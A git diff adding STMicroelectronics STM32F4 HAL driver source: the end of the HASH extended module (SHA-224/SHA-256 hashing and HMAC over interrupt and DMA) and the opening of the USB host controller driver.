Only HAL_HASHEx_SHA224_Accmlt_End_IT() is able + * to manage the ending buffer with a length in bytes not a multiple of 4. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes, must be a multiple of 4. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASHEx_SHA224_Accmlt_IT(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + return HASH_Accumulate_IT(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA224); +} + +/** + * @brief End computation of a single HASH signature after several calls to HAL_HASHEx_SHA224_Accmlt_IT() API. + * @note Digest is available in pOutBuffer. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 28 bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASHEx_SHA224_Accmlt_End_IT(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, + uint8_t *pOutBuffer) +{ + return HASH_Start_IT(hhash, pInBuffer, Size, pOutBuffer, HASH_ALGOSELECTION_SHA224); +} + +/** + * @brief Initialize the HASH peripheral in SHA256 mode, next process pInBuffer then + * read the computed digest in interruption mode. + * @note Digest is available in pOutBuffer. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 32 bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASHEx_SHA256_Start_IT(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, + uint8_t *pOutBuffer) +{ + return HASH_Start_IT(hhash, pInBuffer, Size, pOutBuffer, HASH_ALGOSELECTION_SHA256); +} + +/** + * @brief If not already done, initialize the HASH peripheral in SHA256 mode then + * processes pInBuffer in interruption mode. + * @note Consecutive calls to HAL_HASHEx_SHA256_Accmlt_IT() can be used to feed + * several input buffers back-to-back to the Peripheral that will yield a single + * HASH signature once all buffers have been entered. Wrap-up of input + * buffers feeding and retrieval of digest is done by a call to + * HAL_HASHEx_SHA256_Accmlt_End_IT(). + * @note Field hhash->Phase of HASH handle is tested to check whether or not + * the Peripheral has already been initialized. + * @note The input buffer size (in bytes) must be a multiple of 4 otherwise, the + * HASH digest computation is corrupted. Only HAL_HASHEx_SHA256_Accmlt_End_IT() is able + * to manage the ending buffer with a length in bytes not a multiple of 4. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes, must be a multiple of 4. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASHEx_SHA256_Accmlt_IT(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + return HASH_Accumulate_IT(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA256); +} + +/** + * @brief End computation of a single HASH signature after several calls to HAL_HASHEx_SHA256_Accmlt_IT() API. + * @note Digest is available in pOutBuffer. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 32 bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASHEx_SHA256_Accmlt_End_IT(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, + uint8_t *pOutBuffer) +{ + return HASH_Start_IT(hhash, pInBuffer, Size, pOutBuffer, HASH_ALGOSELECTION_SHA256); +} + +/** + * @} + */ + +/** @defgroup HASHEx_Exported_Functions_Group3 HASH extended processing functions in DMA mode + * @brief HASH extended processing functions using DMA mode. + * +@verbatim + =============================================================================== + ##### DMA mode HASH extended processing functions ##### + =============================================================================== + [..] This section provides functions allowing to calculate in DMA mode + the hash value using one of the following algorithms: + (+) SHA224 + (++) HAL_HASHEx_SHA224_Start_DMA() + (++) HAL_HASHEx_SHA224_Finish() + (+) SHA256 + (++) HAL_HASHEx_SHA256_Start_DMA() + (++) HAL_HASHEx_SHA256_Finish() + + [..] When resorting to DMA mode to enter the data in the Peripheral, user must resort + to HAL_HASHEx_xxx_Start_DMA() then read the resulting digest with + HAL_HASHEx_xxx_Finish(). + + [..] In case of multi-buffer HASH processing, MDMAT bit must first be set before + the successive calls to HAL_HASHEx_xxx_Start_DMA(). Then, MDMAT bit needs to be + reset before the last call to HAL_HASHEx_xxx_Start_DMA(). Digest is finally + retrieved thanks to HAL_HASHEx_xxx_Finish(). + +@endverbatim + * @{ + */ + + + + +/** + * @brief Initialize the HASH peripheral in SHA224 mode then initiate a DMA transfer + * to feed the input buffer to the Peripheral. + * @note Once the DMA transfer is finished, HAL_HASHEx_SHA224_Finish() API must + * be called to retrieve the computed digest. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASHEx_SHA224_Start_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + return HASH_Start_DMA(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA224); +} + +/** + * @brief Return the computed digest in SHA224 mode. + * @note The API waits for DCIS to be set then reads the computed digest. + * @note HAL_HASHEx_SHA224_Finish() can be used as well to retrieve the digest in + * HMAC SHA224 mode. + * @param hhash HASH handle. + * @param pOutBuffer pointer to the computed digest. Digest size is 28 bytes. + * @param Timeout Timeout value. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASHEx_SHA224_Finish(HASH_HandleTypeDef *hhash, uint8_t *pOutBuffer, uint32_t Timeout) +{ + return HASH_Finish(hhash, pOutBuffer, Timeout); +} + +/** + * @brief Initialize the HASH peripheral in SHA256 mode then initiate a DMA transfer + * to feed the input buffer to the Peripheral. + * @note Once the DMA transfer is finished, HAL_HASHEx_SHA256_Finish() API must + * be called to retrieve the computed digest. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASHEx_SHA256_Start_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + return HASH_Start_DMA(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA256); +} + +/** + * @brief Return the computed digest in SHA256 mode. + * @note The API waits for DCIS to be set then reads the computed digest. + * @note HAL_HASHEx_SHA256_Finish() can be used as well to retrieve the digest in + * HMAC SHA256 mode. + * @param hhash HASH handle. + * @param pOutBuffer pointer to the computed digest. Digest size is 32 bytes. + * @param Timeout Timeout value. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASHEx_SHA256_Finish(HASH_HandleTypeDef *hhash, uint8_t *pOutBuffer, uint32_t Timeout) +{ + return HASH_Finish(hhash, pOutBuffer, Timeout); +} + +/** + * @} + */ + +/** @defgroup HASHEx_Exported_Functions_Group4 HMAC extended processing functions in polling mode + * @brief HMAC extended processing functions using polling mode. + * +@verbatim + =============================================================================== + ##### Polling mode HMAC extended processing functions ##### + =============================================================================== + [..] This section provides functions allowing to calculate in polling mode + the HMAC value using one of the following algorithms: + (+) SHA224 + (++) HAL_HMACEx_SHA224_Start() + (+) SHA256 + (++) HAL_HMACEx_SHA256_Start() + +@endverbatim + * @{ + */ + + + +/** + * @brief Initialize the HASH peripheral in HMAC SHA224 mode, next process pInBuffer then + * read the computed digest. + * @note Digest is available in pOutBuffer. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 28 bytes. + * @param Timeout Timeout value. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMACEx_SHA224_Start(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, + uint8_t *pOutBuffer, uint32_t Timeout) +{ + return HMAC_Start(hhash, pInBuffer, Size, pOutBuffer, Timeout, HASH_ALGOSELECTION_SHA224); +} + +/** + * @brief Initialize the HASH peripheral in HMAC SHA256 mode, next process pInBuffer then + * read the computed digest. + * @note Digest is available in pOutBuffer. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 32 bytes. + * @param Timeout Timeout value. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMACEx_SHA256_Start(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, + uint8_t *pOutBuffer, uint32_t Timeout) +{ + return HMAC_Start(hhash, pInBuffer, Size, pOutBuffer, Timeout, HASH_ALGOSELECTION_SHA256); +} + +/** + * @} + */ + + +/** @defgroup HASHEx_Exported_Functions_Group5 HMAC extended processing functions in interrupt mode + * @brief HMAC extended processing functions using interruption mode. + * +@verbatim + =============================================================================== + ##### Interrupt mode HMAC extended processing functions ##### + =============================================================================== + [..] This section provides functions allowing to calculate in interrupt mode + the HMAC value using one of the following algorithms: + (+) SHA224 + (++) HAL_HMACEx_SHA224_Start_IT() + (+) SHA256 + (++) HAL_HMACEx_SHA256_Start_IT() + +@endverbatim + * @{ + */ + + + +/** + * @brief Initialize the HASH peripheral in HMAC SHA224 mode, next process pInBuffer then + * read the computed digest in interrupt mode. + * @note Digest is available in pOutBuffer. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 28 bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMACEx_SHA224_Start_IT(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, + uint8_t *pOutBuffer) +{ + return HMAC_Start_IT(hhash, pInBuffer, Size, pOutBuffer, HASH_ALGOSELECTION_SHA224); +} + +/** + * @brief Initialize the HASH peripheral in HMAC SHA256 mode, next process pInBuffer then + * read the computed digest in interrupt mode. + * @note Digest is available in pOutBuffer. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 32 bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMACEx_SHA256_Start_IT(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, + uint8_t *pOutBuffer) +{ + return HMAC_Start_IT(hhash, pInBuffer, Size, pOutBuffer, HASH_ALGOSELECTION_SHA256); +} + + + + +/** + * @} + */ + + +/** @defgroup HASHEx_Exported_Functions_Group6 HMAC extended processing functions in DMA mode + * @brief HMAC extended processing functions using DMA mode. + * +@verbatim + =============================================================================== + ##### DMA mode HMAC extended processing functions ##### + =============================================================================== + [..] This section provides functions allowing to calculate in DMA mode + the HMAC value using one of the following algorithms: + (+) SHA224 + (++) HAL_HMACEx_SHA224_Start_DMA() + (+) SHA256 + (++) HAL_HMACEx_SHA256_Start_DMA() + + [..] When resorting to DMA mode to enter the data in the Peripheral for HMAC processing, + user must resort to HAL_HMACEx_xxx_Start_DMA() then read the resulting digest + with HAL_HASHEx_xxx_Finish(). + + +@endverbatim + * @{ + */ + + + +/** + * @brief Initialize the HASH peripheral in HMAC SHA224 mode then initiate the required + * DMA transfers to feed the key and the input buffer to the Peripheral. + * @note Once the DMA transfers are finished (indicated by hhash->State set back + * to HAL_HASH_STATE_READY), HAL_HASHEx_SHA224_Finish() API must be called to retrieve + * the computed digest. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @note If MDMAT bit is set before calling this function (multi-buffer + * HASH processing case), the input buffer size (in bytes) must be + * a multiple of 4 otherwise, the HASH digest computation is corrupted. + * For the processing of the last buffer of the thread, MDMAT bit must + * be reset and the buffer length (in bytes) doesn't have to be a + * multiple of 4. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMACEx_SHA224_Start_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + return HMAC_Start_DMA(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA224); +} + +/** + * @brief Initialize the HASH peripheral in HMAC SHA224 mode then initiate the required + * DMA transfers to feed the key and the input buffer to the Peripheral. + * @note Once the DMA transfers are finished (indicated by hhash->State set back + * to HAL_HASH_STATE_READY), HAL_HASHEx_SHA256_Finish() API must be called to retrieve + * the computed digest. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @note If MDMAT bit is set before calling this function (multi-buffer + * HASH processing case), the input buffer size (in bytes) must be + * a multiple of 4 otherwise, the HASH digest computation is corrupted. + * For the processing of the last buffer of the thread, MDMAT bit must + * be reset and the buffer length (in bytes) doesn't have to be a + * multiple of 4. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMACEx_SHA256_Start_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + return HMAC_Start_DMA(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA256); +} + + +/** + * @} + */ + +/** @defgroup HASHEx_Exported_Functions_Group7 Multi-buffer HMAC extended processing functions in DMA mode + * @brief HMAC extended processing functions in multi-buffer DMA mode. + * +@verbatim + =============================================================================== + ##### Multi-buffer DMA mode HMAC extended processing functions ##### + =============================================================================== + [..] This section provides functions to manage HMAC multi-buffer + DMA-based processing for MD5, SHA1, SHA224 and SHA256 algorithms. + (+) MD5 + (++) HAL_HMACEx_MD5_Step1_2_DMA() + (++) HAL_HMACEx_MD5_Step2_DMA() + (++) HAL_HMACEx_MD5_Step2_3_DMA() + (+) SHA1 + (++) HAL_HMACEx_SHA1_Step1_2_DMA() + (++) HAL_HMACEx_SHA1_Step2_DMA() + (++) HAL_HMACEx_SHA1_Step2_3_DMA() + + (+) SHA256 + (++) HAL_HMACEx_SHA224_Step1_2_DMA() + (++) HAL_HMACEx_SHA224_Step2_DMA() + (++) HAL_HMACEx_SHA224_Step2_3_DMA() + (+) SHA256 + (++) HAL_HMACEx_SHA256_Step1_2_DMA() + (++) HAL_HMACEx_SHA256_Step2_DMA() + (++) HAL_HMACEx_SHA256_Step2_3_DMA() + + [..] User must first start-up the multi-buffer DMA-based HMAC computation in + calling HAL_HMACEx_xxx_Step1_2_DMA(). This carries out HMAC step 1 and + intiates step 2 with the first input buffer. + + [..] The following buffers are next fed to the Peripheral with a call to the API + HAL_HMACEx_xxx_Step2_DMA(). There may be several consecutive calls + to this API. + + [..] Multi-buffer DMA-based HMAC computation is wrapped up by a call to + HAL_HMACEx_xxx_Step2_3_DMA(). This finishes step 2 in feeding the last input + buffer to the Peripheral then carries out step 3. + + [..] Digest is retrieved by a call to HAL_HASH_xxx_Finish() for MD-5 or + SHA-1, to HAL_HASHEx_xxx_Finish() for SHA-224 or SHA-256. + + [..] If only two buffers need to be consecutively processed, a call to + HAL_HMACEx_xxx_Step1_2_DMA() followed by a call to HAL_HMACEx_xxx_Step2_3_DMA() + is sufficient. + +@endverbatim + * @{ + */ + +/** + * @brief MD5 HMAC step 1 completion and step 2 start in multi-buffer DMA mode. + * @note Step 1 consists in writing the inner hash function key in the Peripheral, + * step 2 consists in writing the message text. + * @note The API carries out the HMAC step 1 then starts step 2 with + * the first buffer entered to the Peripheral. DCAL bit is not automatically set after + * the message buffer feeding, allowing other messages DMA transfers to occur. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @note The input buffer size (in bytes) must be a multiple of 4 otherwise, the + * HASH digest computation is corrupted. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (message buffer). + * @param Size length of the input buffer in bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMACEx_MD5_Step1_2_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + hhash->DigestCalculationDisable = SET; + return HMAC_Start_DMA(hhash, pInBuffer, Size, HASH_ALGOSELECTION_MD5); +} + +/** + * @brief MD5 HMAC step 2 in multi-buffer DMA mode. + * @note Step 2 consists in writing the message text in the Peripheral. + * @note The API carries on the HMAC step 2, applied to the buffer entered as input + * parameter. DCAL bit is not automatically set after the message buffer feeding, + * allowing other messages DMA transfers to occur. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @note The input buffer size (in bytes) must be a multiple of 4 otherwise, the + * HASH digest computation is corrupted. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (message buffer). + * @param Size length of the input buffer in bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMACEx_MD5_Step2_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + if (hhash->DigestCalculationDisable != SET) + { + return HAL_ERROR; + } + return HMAC_Start_DMA(hhash, pInBuffer, Size, HASH_ALGOSELECTION_MD5); +} + +/** + * @brief MD5 HMAC step 2 wrap-up and step 3 completion in multi-buffer DMA mode. + * @note Step 2 consists in writing the message text in the Peripheral, + * step 3 consists in writing the outer hash function key. + * @note The API wraps up the HMAC step 2 in processing the buffer entered as input + * parameter (the input buffer must be the last one of the multi-buffer thread) + * then carries out HMAC step 3. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @note Once the DMA transfers are finished (indicated by hhash->State set back + * to HAL_HASH_STATE_READY), HAL_HASHEx_SHA256_Finish() API must be called to retrieve + * the computed digest. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (message buffer). + * @param Size length of the input buffer in bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMACEx_MD5_Step2_3_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + hhash->DigestCalculationDisable = RESET; + return HMAC_Start_DMA(hhash, pInBuffer, Size, HASH_ALGOSELECTION_MD5); +} + + +/** + * @brief SHA1 HMAC step 1 completion and step 2 start in multi-buffer DMA mode. + * @note Step 1 consists in writing the inner hash function key in the Peripheral, + * step 2 consists in writing the message text. + * @note The API carries out the HMAC step 1 then starts step 2 with + * the first buffer entered to the Peripheral. DCAL bit is not automatically set after + * the message buffer feeding, allowing other messages DMA transfers to occur. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @note The input buffer size (in bytes) must be a multiple of 4 otherwise, the + * HASH digest computation is corrupted. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (message buffer). + * @param Size length of the input buffer in bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMACEx_SHA1_Step1_2_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + hhash->DigestCalculationDisable = SET; + return HMAC_Start_DMA(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA1); +} + +/** + * @brief SHA1 HMAC step 2 in multi-buffer DMA mode. + * @note Step 2 consists in writing the message text in the Peripheral. + * @note The API carries on the HMAC step 2, applied to the buffer entered as input + * parameter. DCAL bit is not automatically set after the message buffer feeding, + * allowing other messages DMA transfers to occur. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @note The input buffer size (in bytes) must be a multiple of 4 otherwise, the + * HASH digest computation is corrupted. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (message buffer). + * @param Size length of the input buffer in bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMACEx_SHA1_Step2_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + if (hhash->DigestCalculationDisable != SET) + { + return HAL_ERROR; + } + return HMAC_Start_DMA(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA1); +} + +/** + * @brief SHA1 HMAC step 2 wrap-up and step 3 completion in multi-buffer DMA mode. + * @note Step 2 consists in writing the message text in the Peripheral, + * step 3 consists in writing the outer hash function key. + * @note The API wraps up the HMAC step 2 in processing the buffer entered as input + * parameter (the input buffer must be the last one of the multi-buffer thread) + * then carries out HMAC step 3. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @note Once the DMA transfers are finished (indicated by hhash->State set back + * to HAL_HASH_STATE_READY), HAL_HASHEx_SHA256_Finish() API must be called to retrieve + * the computed digest. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (message buffer). + * @param Size length of the input buffer in bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMACEx_SHA1_Step2_3_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + hhash->DigestCalculationDisable = RESET; + return HMAC_Start_DMA(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA1); +} + +/** + * @brief SHA224 HMAC step 1 completion and step 2 start in multi-buffer DMA mode. + * @note Step 1 consists in writing the inner hash function key in the Peripheral, + * step 2 consists in writing the message text. + * @note The API carries out the HMAC step 1 then starts step 2 with + * the first buffer entered to the Peripheral. DCAL bit is not automatically set after + * the message buffer feeding, allowing other messages DMA transfers to occur. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @note The input buffer size (in bytes) must be a multiple of 4 otherwise, the + * HASH digest computation is corrupted. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (message buffer). + * @param Size length of the input buffer in bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMACEx_SHA224_Step1_2_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + hhash->DigestCalculationDisable = SET; + return HMAC_Start_DMA(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA224); +} + +/** + * @brief SHA224 HMAC step 2 in multi-buffer DMA mode. + * @note Step 2 consists in writing the message text in the Peripheral. + * @note The API carries on the HMAC step 2, applied to the buffer entered as input + * parameter. DCAL bit is not automatically set after the message buffer feeding, + * allowing other messages DMA transfers to occur. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @note The input buffer size (in bytes) must be a multiple of 4 otherwise, the + * HASH digest computation is corrupted. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (message buffer). + * @param Size length of the input buffer in bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMACEx_SHA224_Step2_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + if (hhash->DigestCalculationDisable != SET) + { + return HAL_ERROR; + } + return HMAC_Start_DMA(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA224); +} + +/** + * @brief SHA224 HMAC step 2 wrap-up and step 3 completion in multi-buffer DMA mode. + * @note Step 2 consists in writing the message text in the Peripheral, + * step 3 consists in writing the outer hash function key. + * @note The API wraps up the HMAC step 2 in processing the buffer entered as input + * parameter (the input buffer must be the last one of the multi-buffer thread) + * then carries out HMAC step 3. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @note Once the DMA transfers are finished (indicated by hhash->State set back + * to HAL_HASH_STATE_READY), HAL_HASHEx_SHA256_Finish() API must be called to retrieve + * the computed digest. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (message buffer). + * @param Size length of the input buffer in bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMACEx_SHA224_Step2_3_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + hhash->DigestCalculationDisable = RESET; + return HMAC_Start_DMA(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA224); +} + +/** + * @brief SHA256 HMAC step 1 completion and step 2 start in multi-buffer DMA mode. + * @note Step 1 consists in writing the inner hash function key in the Peripheral, + * step 2 consists in writing the message text. + * @note The API carries out the HMAC step 1 then starts step 2 with + * the first buffer entered to the Peripheral. DCAL bit is not automatically set after + * the message buffer feeding, allowing other messages DMA transfers to occur. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @note The input buffer size (in bytes) must be a multiple of 4 otherwise, the + * HASH digest computation is corrupted. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (message buffer). + * @param Size length of the input buffer in bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMACEx_SHA256_Step1_2_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + hhash->DigestCalculationDisable = SET; + return HMAC_Start_DMA(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA256); +} + +/** + * @brief SHA256 HMAC step 2 in multi-buffer DMA mode. + * @note Step 2 consists in writing the message text in the Peripheral. + * @note The API carries on the HMAC step 2, applied to the buffer entered as input + * parameter. DCAL bit is not automatically set after the message buffer feeding, + * allowing other messages DMA transfers to occur. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @note The input buffer size (in bytes) must be a multiple of 4 otherwise, the + * HASH digest computation is corrupted. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (message buffer). + * @param Size length of the input buffer in bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMACEx_SHA256_Step2_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + if (hhash->DigestCalculationDisable != SET) + { + return HAL_ERROR; + } + return HMAC_Start_DMA(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA256); +} + +/** + * @brief SHA256 HMAC step 2 wrap-up and step 3 completion in multi-buffer DMA mode. + * @note Step 2 consists in writing the message text in the Peripheral, + * step 3 consists in writing the outer hash function key. + * @note The API wraps up the HMAC step 2 in processing the buffer entered as input + * parameter (the input buffer must be the last one of the multi-buffer thread) + * then carries out HMAC step 3. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @note Once the DMA transfers are finished (indicated by hhash->State set back + * to HAL_HASH_STATE_READY), HAL_HASHEx_SHA256_Finish() API must be called to retrieve + * the computed digest. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (message buffer). + * @param Size length of the input buffer in bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMACEx_SHA256_Step2_3_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + hhash->DigestCalculationDisable = RESET; + return HMAC_Start_DMA(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA256); +} + +/** + * @} + */ + +#endif /* MDMA defined*/ +/** + * @} + */ +#endif /* HAL_HASH_MODULE_ENABLED */ + +/** + * @} + */ +#endif /* HASH*/ +/** + * @} + */ + + + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_hcd.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_hcd.c new file mode 100644 index 000000000..6ab4a3d37 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_hcd.c @@ -0,0 +1,1747 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_hcd.c + * @author MCD Application Team + * @brief HCD HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the USB Peripheral Controller: + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral Control functions + * + Peripheral State functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + (#)Declare a HCD_HandleTypeDef handle structure, for example: + HCD_HandleTypeDef hhcd; + + (#)Fill parameters of Init structure in HCD handle + + (#)Call HAL_HCD_Init() API to initialize the HCD peripheral (Core, Host core, ...) + + (#)Initialize the HCD low level resources through the HAL_HCD_MspInit() API: + (##) Enable the HCD/USB Low Level interface clock using the following macros + (+++) __HAL_RCC_USB_OTG_FS_CLK_ENABLE(); + (+++) __HAL_RCC_USB_OTG_HS_CLK_ENABLE(); (For High Speed Mode) + (+++) __HAL_RCC_USB_OTG_HS_ULPI_CLK_ENABLE(); (For High Speed Mode) + + (##) Initialize the related GPIO clocks + (##) Configure HCD pin-out + (##) Configure HCD NVIC interrupt + + (#)Associate the Upper USB Host stack to the HAL HCD Driver: + (##) hhcd.pData = phost; + + (#)Enable HCD transmission and reception: + (##) HAL_HCD_Start(); + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

